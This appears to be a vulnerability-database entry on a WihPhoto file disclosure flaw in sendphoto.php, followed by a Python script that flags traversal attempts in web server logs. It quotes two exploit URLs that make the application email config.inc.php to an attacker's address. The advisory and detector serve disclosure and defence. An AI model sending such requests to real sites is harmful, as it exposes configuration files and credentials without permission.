vendor: WihPhoto
by: SecurityFocus
CVSS: 7.5 HIGH
File Disclosure Vulnerability
CWE: 200
Product Name: WihPhoto
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

WihPhoto File Disclosure Vulnerability

The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script. An attacker can exploit it by specifying arbitrary files as the values of these parameters, which causes WihPhoto to send an email with the attacker-specified file as an attachment.

Mitigation:

The vendor has released a patch to address this issue. Users should upgrade to the latest version of WihPhoto.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6929/info

A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.

The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.

An attacker can exploit this vulnerability and specify arbitrary files as the parameters to the variables. This will cause WihPhoto to send an email with the attacker-specified file as an attachment. 


http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
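
A detection check for the request pattern shown above, as an added example that is not part of the original advisory or of WihPhoto's code: it scans web server access logs for sendphoto.php requests whose album or pic parameter contains a traversal segment, an absolute path or a NUL byte. The combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
WATCHED_PARAMS = ("album", "pic")  # parameters named in the advisory's URLs

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so the check sees the final value."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(value):
    """True if the value can point outside the intended album directory."""
    v = fully_decode(value).replace("\\", "/")
    if "\x00" in v or v.startswith("/") or re.match(r"[A-Za-z]:", v):
        return True
    return ".." in v.split("/")  # whole path segment, so "my..album" is fine

def flag_requests(log_lines):
    """Return (line_number, param, value) for each suspicious sendphoto.php hit."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/sendphoto.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                if is_suspicious(value):
                    findings.append((number, name, value))
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00 +0000] "GET /sendphoto.php?album=holiday&pic=beach.jpg HTTP/1.0" 200 512',
    '192.0.2.77 - - [01/Jan/2003:10:00:05 +0000] "GET /sendphoto.php?album=..&pic=config.inc.php&filled=1 HTTP/1.0" 200 498',
    '192.0.2.77 - - [01/Jan/2003:10:00:09 +0000] "GET /sendphoto.php?album=%252e%252e&pic=config.inc.php HTTP/1.0" 200 498',
    '192.0.2.10 - - [01/Jan/2003:10:00:12 +0000] "GET /index.php?album=.. HTTP/1.0" 200 901',
]

print(flag_requests(SAMPLE_LOG))
```

A hit indicates an attempt only; whether a file was actually mailed has to be confirmed from the mail server's own logs.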